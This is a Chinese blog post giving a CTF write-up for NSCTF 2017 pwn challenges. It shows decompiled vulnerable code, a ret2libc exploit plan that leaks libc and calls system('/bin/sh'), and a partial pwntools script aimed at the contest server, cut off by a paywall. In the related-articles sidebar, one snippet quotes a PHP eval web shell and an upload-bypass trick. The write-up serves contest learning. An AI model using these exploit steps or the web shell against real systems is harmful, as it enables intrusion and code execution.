绿盟杯NSCTF(CCTF)2017 pwn writeup

最新推荐文章于 2024-06-25 16:08:58 发布
最新推荐文章于 2024-06-25 16:08:58 发布
阅读量6k 收藏 3
点赞数 1
分类专栏: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29343201/article/details/75676135
版权
本文介绍了绿盟杯NSCTF 2017中两个pwn题目的解决方案。作者详细分析了栈溢出漏洞,包括利用方法、存在的问题以及解决策略。在pwn1中,通过栈溢出控制返回地址,泄露read函数地址以获取libc基址。在pwn2中,由于canary的存在,采用return to dl-resolve方法。需要注意libc的准确性、/bin/sh的结束符和利用alarm时间限制的问题。
摘要由CSDN通过智能技术生成

前言

比赛有无数值得吐槽的地方,其中最主要的是,题目给了pwn的libc,然而,特么是错的,也就是说虽然给了libc,但是其实还是靠运气/当做没有libc解,顺手记录一下这两个水题。

pwn1

分析

main

int __cdecl main()
{
  alarm(0x1u);
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  puts("[*]Put Your Name:");
  do_main();
  return 0;
}

do_main:

ssize_t do_main()
{
  char buf; // [sp+10h] [bp-88h]@1

  read(0, &buf, 0x100u);
  return write(1, &buf, 0x100u);
}

逻辑很简单,read读取输入到栈上的buf,然后write输出,大小都是0x100,但是buf的大小是没有这么大的,所以存在栈溢出,题目的sec有:

[*] '/home/vagrant/ctf/contests/nsctf-2017/pwn/pwn1/pwn1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

思路:
1. read导致溢出,然后控制返回地址指向read函数的位置,并且设置好参数,read到elf的data段,因为没有开启PIE,所以data段位置是固定的。之后的返回地址指向main的开始,再次进入main
2. 之后会先进入read函数,读入到data段,写入/bin/sh\x00字符串。
3. 再次进入main,这次控制返回地址先指向write函数位置,并且设置好参数,使得buf指向read在plt.got的位置,使得write将read的地址泄露出来,之后的下一步返回地址再次指向main的开始,再进入main
4. 第三次进入main,我们已经拿到了read函数的地址,计算得到libc的基地址,然后得到system地址,/bin/sh\x00的位置是我们自己在第二步写入的,所以已知,设置好参数,返回指向system即可

exp

from pwn import *
context(os='linux', arch='i386', log_level='debug')

DEBUG = 0
UBUNTU = 1
GDB = 0
if DEBUG:
    p = process("./pwn1")
    if UBUNTU:
        libc = ELF("/lib/i386-linux-gnu/libc.so.6")
    else:
        libc = ELF("/usr/lib32/libc.so.6")
else:
    libc = ELF("./libc-2.19.so")
    p = remote('116.62.63.190', 8888)

def main():
    if DEBUG:
        offset = 0x1b2000
    else:
        offset = 0x1a2000

    if GDB:
        raw_input()

    read_addr = 0x080483f0
    write_addr = 0x08048440
    do_main_addr = 0x0804854d

    p.recvline()
    payload_prefix = '/bin/sh\x00'.ljust(
最低0.47元/天 解锁文章
Anciety
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CCTF重邮(绿盟_部分解密题WriteUp
焚卷觅光的博客
07-31 5156
CCTF重邮(绿盟_部分解密题0X00   Kungfu解开压缩包,里面就是一个图片(又是那个卖如来神掌的老乞丐),按照脑洞惯例跑Stegsolve。在文件底发现了“key is …..”把它复制出来再说。VF95c0s5XzVyaGtfX3VGTXR9M0Vse251QEUg明显是一个base64加密,放解码器跑出来是这个:T_ysK9_5rhk__uFMt}3El{nu@E 这已经很接近fl
nsctf php version,绿盟NSCTFCCTF2017 pwn writeup
weixin_33034651的博客
03-21 261
前言比赛有无数值得吐槽的地方,其中最主要的是,题目给了pwn的libc,然而,特么是错的,也就是说虽然给了libc,但是其实还是靠运气/当做没有libc解,顺手记录一下这两个水题。pwn1分析mainint __cdecl main(){alarm(0x1u);setbuf(stdin, 0);setbuf(stdout, 0);setbuf(stderr, 0);puts("[*]Put You...
绿盟漏洞扫描/绿盟漏洞扫描工具用户手册-入门黑客技巧
最新发布
程序员六七的博客
06-25 1219
有实力,更硬气
安恒赛php_CTF-安恒18年十一月月赛部分writeup
weixin_39784460的博客
12-21 186
安恒十一月月赛writeup昨天做了一下十一月的题目,不才只做出来几道签到web1这个是十月的原题,因为忘了截图所以只能提供思路Web消息头包含了登陆框的密码输入密码后进入上传页面,上传一句话木马1.jpg,使用burp将上传文件名改为1.php.jpg然后post数据发现已经getshellFlag就在上一层目录里所以post数据:system(‘dir ../’);得出flag为:flag{6...
CTFpwn总结 入门
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
CTF-安恒18年十一月月赛部分writeup
weixin_33786077的博客
12-14 622
安恒十一月月赛writeup 昨天做了一下十一月的题目,不才只做出来几道 签到web1 这个是十月的原题,因为忘了截图所以只能提供思路 Web消息头包含了登陆框的密码 输入密码后进入上传页面,上传一句话木马1.jpg, <?php @eval($_POST['cmd']);?> 使用burp将上传文件名改为1.php.jpg 然后post数据发现已经getshel...
常用图标库_绿盟.ppt
08-17
绿盟
2017绿盟 物联网安全年报1
08-03
2.1简介62.1.1 研究方法 62.1.2 关键性发现 72.2 物联网设备的暴露情况分析 82.2.1 整体情况 82.2.2 路由器 92.2.3 视频
绿盟售前工程师NSSP试题有带部分答案
11-06
绿盟售前工程师NSSP试题 ,115题 带部分答案, ,准备考绿盟售前工程师的朋友,可以看看!很有用!
绿盟主机扫描报告生成1.3(修复web汇总bug).xls
07-22
能够对绿盟极光安全扫描器扫描出来的报告进行二次加工,目前可生成主机报告以及web报告。原先的绿盟生成出来的Excel格式报告非常乱,而且不好归类,我写了个宏将扫描出来后的主机问题全部按照漏洞类型,风险描述,...
CTF工具大全_2020.08.rar
08-10
CTF工具大全_2020.08.rar
CTF-安恒19年一月月赛部分writeup
weixin_34117211的博客
01-27 1708
CTF-安恒19年一月月赛部分writeup MISC1-赢战2019 是一道图片隐写题 linux下可以正常打开图片,首先到binwalk分析一下。 里面有东西,foremost分离一下 有一张二维码,扫一下看看 好吧 不是flag,继续分析图片,在winhex没有发现异常,那么上神器StegSolve分析一下 第一次翻了一遍图层没发现,眼瞎第二次才看见 ...
安恒赛php_安恒11月月赛周周练writeup
weixin_39881513的博客
12-21 319
前言11月月赛 完美错过时间,正好有周周练,基本都是一样月赛的web,记录下write up手速要快这题是10月月赛中的一题,直接看我上次的writeup:安恒月赛(十)web-2题writeup,这里不重复了image_upimage.png随意输入username和password登陆,image.png随意尝试上传了文件,好像只能jpg结尾,上传后无回显任何内容。page=upload当前页...
NJUST CTF 2018 Writeup
qq_37820590的博客
03-17 2117
NJUST CTF 2018 Writeup Supernova, Nanjing Universityfrostwing98,Trap,Arcadia MISC1 签到by Arcadia一路调戏ai之后(误)可以得到一串base64编码的字符串,在线解码得到flagMISC2 GIFby frostwing98下载到gif,发现是不断闪烁的黑/白画面,第一考虑是莫尔斯电码。首先http://tu
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
2017-NSCTF-PWN
hl1293348082的专栏
04-10 145
写在最前 这次比赛值得吐槽的地方很多,但是我要忍住,先讲正经的。 这次总结比赛的两道pwn,都是栈溢出类型的,比较简单。先放上题目链接:http://pan.baidu.com/s/1miT1kPM密码:hwt3 正式写wp之前我需要默认你们都会IDA和gdb+peda的一些调试技巧以及脚本的编写,我主要讲题目思路,不然这篇文章就变成了工具教学。 PWN1 查看程序信息,32位,动态链接,只开了NX保护,RELORO是Partial。 那么做法就很多了。思路后面讲,继续看程序。 程序..
你必须让他停下 writeup
weixin_43400535的博客
02-06 731
8.你必须让他停下 这道题查看源码发现页面一直在刷新,无法停下,不过要想让他停下有个办法,用burpsuite抓包拦截 试了几次之后发现抓到了! 得到了flag flag{dummy_game_1s_s0_popular} ...
CTF 【每日一题20160606】
hhhparty的博客
06-05 2602
聪明的小羊 一只小羊跳过了栅栏,两只小样跳过了栅栏,一坨小羊跳过了栅栏... tn cjtfsiwal kes,hwitbn  g,npt ttessfg}ua u  hmqik e {c,  n huiouosarwzmiibecesnren. 请回答你所能看到的,答案形式cwtf{你的答案} 分析 里面出现了栅栏一词,那可能是“栅栏”加密。 栅栏加密
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值